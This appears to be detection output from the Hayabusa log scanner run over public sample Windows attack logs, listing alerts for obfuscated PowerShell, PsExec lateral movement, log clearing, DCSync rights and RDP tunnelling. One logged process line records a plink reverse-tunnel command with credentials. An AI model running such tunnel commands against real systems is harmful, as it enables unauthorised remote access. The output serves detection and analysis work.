03:15:55.285 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.296 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.296 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.296 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle 
Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,low,Evas,Use Remove-Item to Delete File,,rules/sigma/powershell/powershell_script/posh_ps_remove_item_path.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Exec,Malicious PowerShell 
Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:18:01.084 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:22:37.536 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:23:59.512 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:25:40.262 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:27:04.659 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:56:34.470 +09:00,SEC511,4104,high,Exec,Malicious PowerShell 
Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:58:22.516 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:59:31.974 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 04:01:22.441 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 04:12:28.360 +09:00,SEC511,4104,high,Exec,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 04:15:23.660 +09:00,SEC511,4104,high,Exec,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:25:48.647 +09:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx +2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: blabla.exe | IP Addr: 10.0.2.16 | LID: 0x162630,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.350 
+09:00,IEWIN7,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: blabla.exe | IP Addr: 10.0.2.16 | LID: 0x162630,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.540 +09:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-20 16:00:50.800 
+09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_bloodhound.evtx +2019-01-20 16:29:57.863 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_psloggedon.evtx +2019-02-02 18:16:52.479 +09:00,ICORP-DC.internal.corp,4776,info,,NTLM Logon To Local Account,User: helpdesk | Computer: evil.internal.corp | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 18:17:22.562 +09:00,ICORP-DC.internal.corp,4776,info,,NTLM Logon To Local Account,User: EXCHANGE$ | Computer: EXCHANGE | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 18:17:22.563 +09:00,ICORP-DC.internal.corp,4624,info,,Logon Type 3 - Network,User: EXCHANGE$ | Computer: EXCHANGE | IP Addr: 192.168.111.87 | LID: 0x24daa6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 18:17:22.563 +09:00,ICORP-DC.internal.corp,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend 
Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-14 00:15:04.175 +09:00,PC02.example.corp,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:15:08.689 +09:00,PC02.example.corp,4624,low,,Logon Type 5 - Service,User: sshd_server | Computer: PC02 | IP Addr: - | LID: 0xe509,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:19:51.259 +09:00,PC02.example.corp,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: PC02 | IP Addr: 127.0.0.1 | LID: 0x21f73 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,info,,Logon Type 10 - RDP (Remote Interactive),User: IEUser | Computer: PC02 | IP Addr: 127.0.0.1 | LID: 0x45120 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,high,LatMov,RDP Login from Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 
Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:29:40.657 +09:00,PC02.example.corp,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: PC02 | IP Addr: 127.0.0.1 | LID: 0x4a26d | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:31:19.529 +09:00,PC02.example.corp,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: PC01 | IP Addr: 10.0.2.17 | LID: 0x73d02,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:31:31.556 +09:00,PC02.example.corp,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: PC01 | IP Addr: 10.0.2.17 | LID: 0x7d4f4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 03:01:41.593 +09:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: admin01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4624,info,,Logon Type 11 - CachedInteractive,User: user01 | Computer: PC01 | IP Addr: 127.0.0.1 | LID: 0x1414c8 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-11-CachedInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: PC01$ | Target User: user01 | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: 
localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4624,info,,Logon Type 7 - Unlock,User: user01 | Computer: PC01 | IP Addr: - | LID: 0x1414d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-7-Unlock.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: PC01$ | Target User: user01 | IP Address: - | Process: C:\Windows\System32\lsass.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:43.171 +09:00,PC01.example.corp,4672,info,,Admin Logon,User: admin01 | LID: 0x14871d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel 
WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:57.442 +09:00,PC01.example.corp,4672,info,,Admin Logon,User: admin01 | LID: 0x148f5d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,info,,Logon Type 10 - RDP (Remote Interactive),User: admin01 | Computer: PC01 | IP Addr: 127.0.0.1 | LID: 0x14a321 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4672,info,,Admin Logon,User: admin01 | LID: 0x14a321,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: PC01$ | Target User: admin01 | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,high,LatMov,RDP Login from Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,low,LatMov,Admin User Remote Logon,,rules/sigma/builtin/security/win_admin_rdp_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-16 19:01:46.884 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 
239.255.255.250:1900 () | Dst: 10.0.2.16:57182 () | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:01:50.699 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\plink.exe | PID: 3520 | PGUID: 365ABB72-DD79-5C67-0000-00109C931000,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test | Process: C:\Users\IEUser\Desktop\plink.exe | User: PC01\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x26656 | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,medium,Exfil | C2,Exfiltration and Tunneling Tools Execution,,rules/sigma/process_creation/proc_creation_win_exfiltration_and_tunneling_tools_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,high,C2 | LatMov,Suspicious Plink Remote Forwarding,,rules/sigma/process_creation/proc_creation_win_susp_plink_remote_forward.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:02:22.965 
+09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:49185 (PC01.example.corp) | Dst: 10.0.2.18:80 (PC02) | User: PC01\IEUser | Process: C:\Users\IEUser\Desktop\plink.exe | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:49186 (PC01.example.corp) | Dst: 127.0.0.2:3389 () | User: PC01\IEUser | Process: C:\Users\IEUser\Desktop\plink.exe | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.2:3389 () | Dst: 127.0.0.1:49186 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,high,LatMov,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:03:02.272 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:64763 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:03:02.272 +09:00,PC01.example.corp,3,info,,Network 
Connection,udp | Src: 10.0.2.17:61400 (PC01.example.corp) | Dst: 224.0.0.252:5355 () | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:03:47.086 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:1900 () | Dst: 10.0.2.16:59304 () | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:03:48.058 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: PC01\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x26656 | PID: 2504 | PGUID: 365ABB72-E004-5C67-0000-00107C9B1500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:03:48.078 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\UI0Detect.exe | PID: 2504 | PGUID: 365ABB72-E004-5C67-0000-00107C9B1500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.141 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 3444 | PGUID: 365ABB72-E014-5C67-0000-0010FCA01500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.151 
